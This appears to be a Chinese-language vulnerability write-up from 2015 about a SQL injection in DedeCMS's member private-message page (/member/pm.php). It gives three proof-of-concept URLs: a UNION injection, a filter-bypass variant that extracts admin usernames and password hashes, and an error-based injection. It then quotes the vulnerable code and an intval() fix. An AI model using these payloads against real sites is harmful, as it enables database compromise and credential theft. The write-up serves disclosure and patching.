dedecms /member/pm.php SQL Injection Vul

Andrew.Hann發表於2015-05-21
PHPSQL

catalog

1. 漏洞描述
2. 漏洞觸發條件
3. 漏洞影響範圍
4. 漏洞程式碼分析
5. 防禦方法
6. 攻防思考

 

1. 漏洞描述

Dedecms會員中心注入漏洞

Relevant Link

http://www.05112.com/anquan/ldfb/sql/2014/0209/7723.html


2. 漏洞觸發條件

0x1: POC1

http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1' and char(@`'`) and 1=2+UniOn+SelEct 1,2,3,4,5,6,7,8,9,10,11,12%20%23

0x2: POC2

如果報錯: Safe Alert: Request Error step 1 !

http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′and char(@`’`) and 1=2+/*!50000Union*/+/*!50000select*/+1,2,3,4,5,6,userid,8,9,10,11,pwd+from+`%23@__admin`%23

0x3: POC3

報錯注入

http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′ and @' and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

Relevant Link

http://www.myhack58.com/Article/html/3/62/2014/42255.htm


3. 漏洞影響範圍
4. 漏洞程式碼分析

/member/pm.php

else if($dopost=='read')
{
    $sql = "SELECT * FROM `#@__member_friends` WHERE  mid='{$cfg_ml->M_ID}' AND ftype!='-1'  ORDER BY addtime DESC LIMIT 20";
    $friends = array();
    $dsql->SetQuery($sql);
    $dsql->Execute();
    while ($row = $dsql->GetArray()) 
    {
        $friends[] = $row;
    }
    //$id注入
    $row = $dsql->GetOne("SELECT * FROM `#@__member_pms` WHERE id='$id' AND (fromid='{$cfg_ml->M_ID}' OR toid='{$cfg_ml->M_ID}')");//ID沒過濾
    if(!is_array($row))
    {
        ShowMsg('對不起,你指定的訊息不存在或你沒許可權檢視!','-1');
        exit();
    }
    //$id注入
    $dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE id='$id' AND folder='inbox' AND toid='{$cfg_ml->M_ID}'");
    $dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE folder='outbox' AND toid='{$cfg_ml->M_ID}'");
    include_once(dirname(__FILE__).'/templets/pm-read.htm');
    exit();
}

Relevant Link

http://0day5.com/archives/1313


5. 防禦方法

/member/pm.php

else if($dopost=='read')
{
    $sql = "Select * From `#@__member_friends` where  mid='{$cfg_ml->M_ID}' And ftype!='-1'  order by addtime desc limit 20";
    $friends = array();
    $dsql->SetQuery($sql);
    $dsql->Execute();
    while ($row = $dsql->GetArray()) 
    {
        $friends[] = $row;
    }
    /* $id過濾 */
    $id = intval($id);
    /* */ 
    $row = $dsql->GetOne("Select * From `#@__member_pms` where id='$id' And (fromid='{$cfg_ml->M_ID}' Or toid='{$cfg_ml->M_ID}')");
    if(!is_array($row))
    {
        ShowMsg('對不起,你指定的訊息不存在或你沒許可權檢視!','-1');
        exit();
    }
    $dsql->ExecuteNoneQuery("Update `#@__member_pms` set hasview=1 where id='$id' And folder='inbox' And toid='{$cfg_ml->M_ID}'");
    $dsql->ExecuteNoneQuery("Update `#@__member_pms` set hasview=1 where folder='outbox' And toid='{$cfg_ml->M_ID}'");
    include_once(dirname(__FILE__).'/templets/pm-read.htm');
    exit();
}


6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

 

相關文章